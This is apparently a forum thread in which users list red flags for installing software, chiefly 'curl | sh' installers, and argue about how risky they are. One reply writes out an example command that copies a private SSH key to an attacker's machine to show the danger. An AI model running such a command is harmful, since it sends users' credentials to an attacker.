Have you ever found a GitHub project or anything that seemed nice and tempting to install until you dug a bit deeper?

What are some red flags that should detur anyone from installing and running something?

  • gera@feddit.nuEnglish
    261·
    1 day ago
    • curl | sh installation method
    • vomit-colored website, vomit-colored developer avatars, or more obvious: AGENTS.MD in the repo
    • compiling yourself is “unsupported”/“not recommended”
    • the official website aggressively advertising the company’s SAAS which makes it look like their opensource software is actually paid product
    • github issues using convoluted template, instead of letting me write freeform text
      • Escape13@slrpnk.net
        2·
        6 hours ago

        Let’s say you curl bash something and it has ie ‘scp ~/.ssh/id_ed25519 badComputerGuy’ in it then you just uploaded your private key to the bad guys. And that’s why ssh keys should be password protected

      • Miaou@jlai.lu
        4·
        9 hours ago

        The real answer is that user-agents can be used to show you one version in your browser and then serve you another one with curl.

        I say “real” because all the idiots talking about “don’t run scripts from the internet!!!” probably forget they don’t decompile every binary they run. E.g. the rustup installer (the tool for managing Rust toolchains) is by default a curl+bash one liner. Why would I worry about them serving me a wrong script when I’m any way about to run their binary blob?

        If you have any doubt about the hosting service (which might or not be the same as the software author!) then avoid piping into bash, but then why would you run their code at all if you distrust them so much? Do you expect github to install a keylogger? Probably not. Some telemetry hook to know whose running the requested script? Possibly someday

      • Nibodhika@lemmy.world
        1·
        8 hours ago

        In THEORY they’re bad because the script could do malicious things and you shouldn’t blindly trust random people on the internet telling you what to execute.

        In practice it’s mostly fearmongering because you’re likely trying to install a binary that could do malicious things anyways. “Mostly” because it is a bit less safe as one could MITM the script more easily or something, but not really by that much.

        You shouldn’t run curl | sh scripts some random person sends you, but running an official script prom an official source is no more dangerous than running a .Deb file from that same source.

      • osanna@lemmy.vgEnglish
        3·
        15 hours ago

        As others have said, you are boldly trusting that the script you’re downloading is safe. ALWAYS examine a script before you pipe to bash. Also, open the script in your browser, the copy paste j to your terminal. It’s entirely possible to change the script based on use agent to display differently when your check in your browser versus when you pipe to bash

      • Saganaki@lemmy.zip
        4·
        16 hours ago

        “Download this shell script from the web and execute it right away.”

        Probably close to 80% of the words in the sentence are wrong.

      • excral@feddit.org
        1·
        16 hours ago

        It forces you to blindly trust that whatever script curl will download is save to run and does exactly what you want / was promised as it will be executed right away.

      • GreenKnight23@lemmy.world
        2·
        22 hours ago

        which makes sense because they don’t maintain packages on the dozens of different package manager repos.

        IMO it’s kind of bogus to knock a project for having a shell install file.

        • aesthelete@lemmy.world
          2·
          6 hours ago

          Eh, I’d be more sympathetic if there weren’t a dozen different alternatives to making this exclusively how people install your software.

          It’s a virus delivery system waiting to happen. Especially now when you have AI that can help you stand up an imposter site quickly and easily.

          • GreenKnight23@lemmy.world
            1·
            14 hours ago

            it’s not the impact to the user having dozens of choices.

            it’s the impact to the developer to having to maintain the packages for dozens of package repo admins that have each their own special requirements for packages that have to be followed. it’s a huge pita that most companies don’t even bother with and just run their own package repo.

            IMO the user isn’t blameless when using an install script. anyone who just blindly runs arbitrary code without reading it is a fool asking to be attacked.

            • aesthelete@lemmy.world
              1·
              6 hours ago

              Exactly, it’s a shift in responsibilities from the developers of a thing to the users of that thing.

              As a grunt at work and a mid-tier “money haver” at best, I’m tired of having everything shift its costs onto me and it’s a red flag that prevents me from installing and running a software package.

              Everything around nowadays does this shift if they can get away with it.

              I have to set limits on what I tolerate to achieve what gain or the world will leave me dead with a giant tire mark across my chest.